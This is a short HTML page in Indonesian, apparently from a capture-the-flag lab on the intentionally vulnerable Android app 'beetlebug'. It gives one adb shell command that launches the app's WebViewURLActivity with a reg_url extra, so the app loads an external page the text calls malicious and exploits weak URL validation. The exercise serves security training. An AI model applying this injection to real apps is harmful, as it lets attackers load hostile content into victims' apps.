<html>
<head>
<style>



.center {
  margin: auto;
  width: 50%;
  padding: 10px;
}


</style>
</head>
<body>
        <p>
            Gunakan Command ini dari adb shell untuk memanggil external malicious page:<br><br>
        <code>
            adb shell am start -n app.beetlebug/app.beetlebug.ctf.WebViewURLActivity --es reg_url "https://sites.google.com/view/kj3101-weakurlvalidation/home"
        </code>
        </p>
</body>
</html>